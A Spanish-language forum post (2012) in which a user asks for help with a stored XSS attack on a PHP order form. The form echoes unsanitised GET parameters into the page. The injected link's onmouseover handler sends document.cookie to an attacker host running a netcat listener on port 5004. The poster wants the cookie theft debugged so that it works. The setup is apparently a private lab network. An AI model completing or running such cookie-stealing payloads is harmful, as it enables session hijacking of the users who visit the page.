Título: XSS persistente - same origin Publicado por: cascan en 16 Febrero 2012, 21:49 pm Hola a todos, estoy tratando de realizar un xss persistente y no logro dar con la solucion, probablemente es un problema de same origin...
esto es lo que tengo... Tengo un server con: ------------------------------ <?php if (isset($_GET['quantity'])) { $quantity = $_GET['quantity']; $item = $_GET['item']; echo "You ordered ". $quantity . " " . $item . ".<br />"; setcookie("Ordering", $_GET['item'], time() + 31536000); print_r($_COOKIE); } echo (' <html><body> <h4>Tizag Art Supply Order Form</h4> <form action="y.php" method="get"> <select name="item"> <option>Paint</option> <option>Brushes</option> <option>Erasers</option> </select> Quantity: <input name="quantity" type="text" /> <input type="submit" /> </form> </body></html> '); ?> ------------------------------ Tengo un browser que inyecta en el url: http://10.10.10.10/prueba.php?item=Paint&quantity=999 <a onmouseover="document.location='http://10.10.10.20:5004/'document.cookie;">now </a> Y tengo en 10.10.10.20 un nc -l -p 5004 en espera de la peticion Cuando un maquina de la ip 10.10.10.30 ingresa a la 10.10.10.10 y pasa el mouse por "now" llega la informacion a netcat pero no la cookie.... Que hago mal? gracias |